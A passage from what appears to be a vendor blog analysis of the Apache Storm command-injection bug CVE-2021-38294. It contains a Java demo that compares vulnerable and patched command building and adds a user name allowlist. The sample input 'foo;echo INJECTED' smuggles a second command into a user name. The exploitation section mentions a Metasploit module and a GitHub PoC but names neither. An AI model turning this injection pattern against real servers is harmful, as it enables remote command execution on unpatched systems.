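    // Defense in depth (assumption, not part of the Storm fix): only accept names
    // drawn from the POSIX portable username character set.
    private static final Pattern SAFE_USER = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");

    static boolean isSafeUser(String user) {
        return user != null && SAFE_USER.matcher(user).matches();
    }

    // Runs argv directly via ProcessBuilder (as runCommand() does) and returns the
    // exit code plus the combined stdout/stderr of the child process.
    static String run(String[] argv) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        StringBuilder out = new StringBuilder();
        try (BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = r.readLine()) != null) {
                out.append(line).append('\n');
            }
        }
        return "exit=" + p.waitFor() + "\n" + out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input in the same shape as the page's PoC argument.
        String input = args.length > 0 ? args[0] : "foo;echo INJECTED";
        System.out.println("vulnerable argv: " + Arrays.toString(vulnerableCommand(input)));
        System.out.println("patched argv:    " + Arrays.toString(patchedCommand(input)));
        System.out.println("allowlist accepts input: " + isSafeUser(input));
        // Only the patched form is executed: id treats the whole string as one
        // (nonexistent) user name and exits non-zero instead of running echo.
        System.out.print(run(patchedCommand(input)));
    }
}
```

Run it on a Linux host (id(1) is required, which is also why the page notes the bug is Linux-only); passing a plain user name such as your own shows the allowlist accepting it and id listing its groups.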

Exploitation

Here we have two ways to exploit CVE-2021-38294: an exploit within Metasploit, which is easy to use and which most of us are familiar with, using the following module: and the second one is a PoC on GitHub.

Conclusion

Finally, this bug only works on Linux, as the injectable part of the affected component is the code that retrieves the information about the user on Linux. We saw how this vulnerability happens, the root cause of the vulnerability, and how it can be exploited remotely.

Resources

#apache #storm #cve #analysis

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.
